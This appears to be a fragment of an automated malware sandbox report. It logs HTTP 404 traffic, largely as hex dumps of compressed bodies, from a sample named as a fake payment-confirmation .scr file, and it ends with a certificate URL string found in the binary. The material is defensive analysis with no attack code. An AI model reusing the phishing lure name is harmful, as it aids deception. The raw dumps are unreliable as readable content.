Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 09:10:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQuv%2FV1VrdrfLEX5XMHtDKCh9JRS2GqyDUFlSE5gCjx%2FCpp1nvpZ1lFntZZnb%2F34se%2FoQLw2aCFdg2k1tiYXhDwdTzgHx7yHP64M7poRgqdNKphBd1wzn%2FNqgTe6wOlgPtKGOjSzVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91768f53eeb77c84-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1871&rtt_var=935&sent=2&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=4119&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 51 6f db 36 10 7e cf af b8 a9 d8 b0 01 95 68 59 69 13 4b b2 80 cc 4e b0 02 5d 17 ac 2e b6 3e d2 d2 59 64 23 91 1a 79 92 ad 05 fd ef 05 25 c5 76 b0 ad 0f 43 a9 17 ea f8 dd f7 1d 0f f7 31 fd 6e fd db 6a f3 f1 fe 16 04 d5 15 dc 7f f8 f9 ed 9b 15 78 3e 63 7f 44 2b c6 d6 9b 35 fc f9 cb e6 d7 b7 10 06 33 78 4f 46 e6 c4 d8 ed 3b 0f 3c 41 d4 c4 8c ed f7 fb 60 1f 05 da 94 6c f3 3b 3b 38 96 d0 a5 4d 5b df 0e 39 41 41 85 97 5d a4 83 c8 a1 ae 94 5d fe 0b 41 b8 58 2c c6 3c cf 81 e2 8a ab 72 e9 a1 f2 e0 b8 cb 52 81 bc c8 2e 00 00 52 92 54 61 76 39 bb 84 1f ea 82 5b 91 c0 3b 4d 70 a7 5b 55 a4 6c 3c 1c 81 35 12 07 a7 e7 e3 5f ad ec 96 de 4a 2b 42 45 fe a6 6f d0 83 7c fc 5b 7a 84 07 62 4e 3f 81 5c 70 63 91 96 1f 36 77 fe b5 c7 ce 89 14 af 71 e9 15 68 73 23 1b 92 5a 9d 31 bc d7 c6 f4 2f a1 e1 25 82 d2 04 3b 57 cc 31 dd 52 5f 21 50 df e0 a4 95 5b eb 8d 67 6e 6d 75 d1 c3 e3 4e 2b f2 ad fc 1b e3 f0 b2 39 24 90 eb 4a 9b f8 c5 d5 b0 12 18 8e 77 bc 96 55 1f 73 23 79 95 80 a3 f2 79 25 4b 15 e7 a8 08 4d f2 f9 c8 29 c2 67 8c d7 b3 33 ca c5 Data Ascii: 2f7TQo6~hYiKN].>Yd#y%vC1njx>cD+53xOF;<A`l;;8M[9AA]]AX,<rR.RTav9[;Mp[Ul<5_J+BEo\|[zbN?\pc6wqhs#Z1/%;W1R_!P[gnmuN+9$JwUs#yy%KM)g3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 09:10:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 28 Nov 2024 18:44:51 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjYGj%2FimllpM%2BlE7GXK%2BCZNjmXhUzrY7JM2exGnfSqkpFMwxaSCfhNa%2BozwfGWsJqK1ei%2F9uH6C2RGVqcdjcFS6pr1%2BqwXzSJ2p3elQt8aFwRHaDacomYOfJ3sGHZ7Pirp%2FEkZ0PRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91768f63ddf642e4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=435&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 30 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 Data Ascii: 603<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:17 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 69 6d 67 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 75 6c 20 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 31 34 33 2c 20 38 33 29 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 34 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 68 32 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:31 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
